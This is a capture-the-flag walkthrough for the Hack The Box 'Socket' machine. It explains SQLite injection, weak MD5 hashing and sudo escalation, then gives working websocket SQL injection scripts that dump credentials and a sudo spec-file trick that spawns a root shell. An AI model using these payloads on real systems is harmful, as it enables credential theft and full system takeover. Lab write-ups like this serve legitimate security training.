Hack The Box (HTB) Academy : Socket HTB walkthrough

Hack The Box (HTB) Academy : Socket HTB walkthrough : A detailed walkthrough for solving Socket Box on HTB. The box contains vulnerability like SQLite Injection, Weak Hashing and privilege escalation through SUDO shell scaping.

SQLite injection

SQLite injection is a type of security vulnerability that occurs when untrusted data is improperly handled in an application that uses an SQLite database. It is similar to other types of injection attacks, such as SQL injection, but it specifically targets SQLite databases.

SQLite injection occurs when an attacker is able to manipulate the data or queries sent to an SQLite database by exploiting weaknesses in the application’s input validation or query construction. This can lead to unauthorized access, data manipulation, or even complete control of the database.

Here’s a step-by-step explanation of how SQLite injection might be used:

1. Vulnerable Application: The attacker identifies a web application or software that interacts with an SQLite database and has a security vulnerability. This vulnerability typically involves improperly validating or sanitizing user-provided input before using it in SQL queries.
2. Identifying Injection Point: The attacker finds a part of the application where user input is used in constructing an SQLite query. This could be in a search box, login form, or any other input field that interacts with the database.
3. Crafting the Attack: The attacker then inputs malicious SQL code (typically within the user input) to manipulate the database query. The goal is to modify the query in such a way that it reveals sensitive information or performs unintended actions.
4. Exploiting the Vulnerability: When the application processes the input and constructs the SQL query without proper sanitization, the attacker’s injected SQL code gets executed along with the legitimate query. This can lead to unauthorized data access, data deletion, or other malicious actions.

Example of real-world SQLite injection attack:

Let’s consider a simple web application that uses an SQLite database to store user information for authentication. The application has a login page with the following code:

python

import sqlite3

def authenticate(username, password):
    connection = sqlite3.connect("users.db")
    cursor = connection.cursor()

    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    cursor.execute(query)

    user = cursor.fetchone()
    connection.close()

    return user

In this example, the authenticate function takes a username and password as input, and it constructs an SQLite query to check if the provided credentials exist in the database. However, this code is vulnerable to SQLite injection.

An attacker could exploit this vulnerability by inputting malicious data like:

Username: ' OR 1=1 -- Password: anything

The crafted query would then look like:

sql

SELECT * FROM users WHERE username='' OR 1=1 --' AND password='anything'

The -- is used to comment out the remaining part of the query, effectively bypassing the password check. Since 1=1 always evaluates to true, the query would return all users in the database, and the attacker could log in as any user without knowing their password.

To prevent SQLite injection, developers should use parameterized queries (also known as prepared statements) or input validation techniques to properly sanitize user input before using it in database queries.

Weak Hashing

Weak hashing refers to the use of easily guessable or reversible hashing algorithms to store passwords or sensitive data. Hashing is a process used to convert plain text data into a fixed-length string of characters, which is designed to be computationally infeasible to reverse back to the original data. Weak hashing algorithms can be easily cracked or reversed, making them unsuitable for securely storing sensitive information.

One example of a weak hashing algorithm is the “MD5” (Message Digest Algorithm 5) hash function. MD5 was widely used in the past for storing passwords, but it has been proven to have significant vulnerabilities, making it susceptible to attacks like collisions and pre-image attacks. In a collision attack, two different inputs can produce the same MD5 hash, while in a pre-image attack, an attacker can find a message that produces a specific hash.

Example of real-world exploitation of weak hashing (MD5):

Let’s say there is an online service that stores user passwords using MD5 hashing. Here’s a simplified representation of how the passwords are stored in their database:

In this example, the application only uses MD5 to hash the passwords, without employing any additional security measures like salting (adding random data to the password before hashing).

Now, let’s see how an attacker might exploit this weak hashing scheme:

1. Obtaining the Hashes: The attacker gains access to the application’s database, either through a data breach or other means. They now have access to the salted MD5 hashes of all the user passwords.
2. Precomputed Rainbow Tables: The attacker uses precomputed tables called “Rainbow Tables.” These tables contain a vast number of precomputed hashes for common passwords and their corresponding plaintext values.
3. Hash Lookup: The attacker looks up the hash values from the database in the Rainbow Tables to quickly find matching passwords. If the password is common, the attacker can easily retrieve the original plaintext password.
4. Brute Force: If the password is not found in the Rainbow Tables, the attacker can use a brute force attack by systematically trying different combinations of passwords until they find a match.

In this way, the attacker can easily and quickly recover many of the original passwords, especially for weak passwords that are present in the Rainbow Tables. This highlights the importance of using strong, cryptographic hashing algorithms (like bcrypt or Argon2) and adding random salts to each password before hashing to protect against these types of attacks.

Privilege escalation and Sudo shell escaping

Privilege escalation and sudo shell escaping are techniques used by hackers to gain higher levels of access and control on a compromised system. Let’s explain each term and provide a real-life example:

1. Privilege Escalation: Privilege escalation refers to the process of elevating one’s access level or permissions on a system to gain higher privileges than originally granted. In the context of hacking, this involves moving from a lower-privileged user account to a more privileged one, such as gaining administrative or root access. By doing so, attackers can perform actions that would otherwise be restricted, potentially compromising the entire system.
2. Sudo Shell Escaping: Sudo is a command available on Unix-like operating systems that allows a permitted user to execute commands as the superuser (root) or another user, as specified in the sudoers file. When a user executes a command with sudo, they are prompted to enter their password to verify their identity and privileges.

Sudo shell escaping is a technique used to bypass the password prompt and execute commands with elevated privileges without providing the correct password. If an attacker can exploit a weakness in the sudo configuration or a vulnerable command executed through sudo, they can gain unauthorized access to higher privileges.

Read More : Hack The Box Academy Walkthrough – Interface

Real-life Example of Privilege Escalation and Sudo Shell Escaping:

Let’s consider a hypothetical scenario where a web server is running on a Linux system, and a vulnerable web application is hosted on that server. The application allows users to upload files to the server, and it saves these uploaded files in a directory accessible by the web server process.

1. Privilege Escalation: The attacker discovers a security vulnerability in the web application that allows them to upload malicious files to the server. These files can include shell scripts or executable binaries.
2. Sudo Shell Escaping: The attacker’s ultimate goal is to gain root access to the server to control the entire system. They analyze the server configuration and find that the web server process has write access to a specific log file.

The attacker then crafts a malicious payload in a file and uploads it using the web application. The payload contains shell commands that exploit the log file’s write access. For example, the attacker could inject malicious code into the log file that will be executed with elevated privileges by a log processing script, which is run as root through sudo.

Once the log processing script runs with sudo privileges, the attacker’s payload executes, and they gain elevated access, allowing them to escalate their privileges to root. With root access, the attacker can compromise the entire system, install backdoors, exfiltrate sensitive data, and perform various malicious activities.

To prevent such attacks, it’s crucial to regularly update software, perform security audits, and follow the principle of least privilege to limit user access to only what is necessary. Additionally, web applications should be thoroughly tested and audited for security vulnerabilities before deployment.

now after talking about the basics of the technique that which techniques we can use to win this challenge let’s now see how can we break this machine …..

Machine Link:https://app.hackthebox.com/machines/Socket

Machine IP: 10.10.11.206

Enumeration:

Nmap Result

sudo nmap -sV -sC -A 10.10.11.206

Scan Result:

22 tcp open port for ssh

80 tcp open port for http

Websocket on port 5789

let’s do a vulnerability scan of websocket in port 5789 withSTEWS

python3 STEWS-vuln-detect.py -1 -n -u 10.10.11.206:5789

We came to know about a vulnerable url which isws://qreader.htb:5789

Browsing Website :

Now add this10.10.11.206 qreader.htbto /etc/hosts

Now access the websitehttp://qreader.htb/through your browser.

Through this website we can generate and scan a qr code.

Also we can download the software for windows and linux so, let’s download the .exe file and decompile it usingpyinstxtractor.

python3 pyinstxtractor.py qreader.exe

Now go to extracted folder & and examine the qreader.pyc file.

pip3 install uncompyle6

uncompyle6 qreader.pyc > qreader.py

After analyzing the qreader.py file we found the vulnerability as you can see below.

Let’s make a python script to exploit the SQL Injection found in the above source code.

from websocket import create_connection
import json
ws_host = 'ws://qreader.htb:5789'
VERSION = '0.0.3" UNION SELECT group_concat(answer),"2","3","4" FROM answers;-- -'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()

Above code will print all the user as shown below.

Lets write a code to print password of user.

from websocket import create_connection
import json
ws_host = 'ws://qreader.htb:5789'
VERSION = '0.0.3" UNION SELECT username,password,"3","4" from users;-- -'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()

As you can see we got our password and we can decrypt this at crackstation.net website as shown below.

Now it time to login via ssh.

Now copy your user flag.

Runningsudo -lto see any command which we can run as root without password.

build-installer.sh can be run as root without password.

Also read : Hack the Box (HTB) academy machines walkthrough – flight

Command used

echo 'import os;os.system("/bin/bash")' > root.spec

sudo /usr/local/sbin/build-installer.sh build root.spec

As you can see we got our root flag.